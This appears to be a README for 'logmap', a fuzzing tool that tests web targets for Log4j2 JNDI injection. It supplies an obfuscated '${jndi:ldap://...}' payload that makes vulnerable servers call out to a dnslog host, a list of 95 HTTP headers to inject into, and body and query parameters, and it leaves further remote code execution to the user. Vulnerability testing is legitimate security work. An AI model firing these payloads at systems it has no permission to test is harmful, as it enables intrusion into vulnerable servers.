logmap - Log4j2 jndi injection fuzz tool
Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path
Use https://log.xn--9tr.com dnslog by default, If you want to use http://ceye.io, you need to modify the domain and token
Manually edit line #373 in logmap.py to modify:
args.ceye = ["xxxxxx.ceye.io", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]
to
args.ceye = ["1234567.ceye.io", "843fd6d58a8ebede756a2b991d321a5a"]
The default payload is ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//DNS_LOG_DOMAIN/a} You can customize at will, in line #283
This is just a jndi injection fuzz tool, rce or others need yourself
Use
[email protected]:~/$ pip3 install -r requirements.txt
[email protected]:~/$ python3 logmap.py -h
Options
-u URL, --url URL Target URL (e.g. http://example.com )
-f FILE, --file FILE Select a target list file (e.g. list.txt )
-d 1, --dns 1 Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1
-p PAYLOAD Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} )
-t 10 Http timeout default 10s
--proxy PROXY Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)
-h, --help Show this help message and exit
Config
There are currently 95 fuzz headers
Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Ali-CDN-Real-IP
Authorization
Cache-Control
Cdn-Real-Ip
Cdn-Src-Ip
CF-Connecting-IP
Client-IP
Contact
Cookie
DNT
Fastly-Client-Ip
Forwarded-For-Ip
Forwarded-For
Forwarded
Forwarded-Proto
From
If-Modified-Since
Max-Forwards
Originating-Ip
Origin
Pragma
Proxy-Client-IP
Proxy
Referer
TE
True-Client-Ip
True-Client-IP
Upgrade
User-Agent
Via
Warning
WL-Proxy-Client-IP
X-Api-Version
X-Att-Deviceid
X-ATT-DeviceId
X-Client-IP
X-Client-Ip
X-Client-IP
X-Cluster-Client-IP
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo-Bar
X-Foo
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded
X-Forwarded-Port
X-Forwarded-Protocol
X-Forwarded-Proto
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method-Override
X-HTTP-Method-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-Leakix
X-Original-URL
X-Originating-IP
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Requested-With
X-Request-ID
X-True-IP
X-UIDH
X-Wap-Profile
X-WAP-Profile
X-XSRF-TOKEN
Some body and path
You can also modify him to add your own body
payload={}
user={}
pass={}
username={}
password={}
login={}
... ...
?id={}
?username={}
... ...
5 Mar 31, 2022
2 Mar 15, 2022
3 May 10, 2022
15 Nov 23, 2022
25 May 10, 2022
331 Jan 01, 2023
295 Jan 06, 2023
291 Dec 28, 2022
183 Dec 28, 2022
1 Nov 28, 2021
162 Nov 25, 2022
105 Nov 22, 2022
14 Nov 26, 2022
22 Dec 27, 2022
33 Jan 04, 2023
283 Dec 29, 2022
497 Jan 02, 2023
9 Sep 27, 2022
6 Sep 08, 2022
1 Nov 24, 2022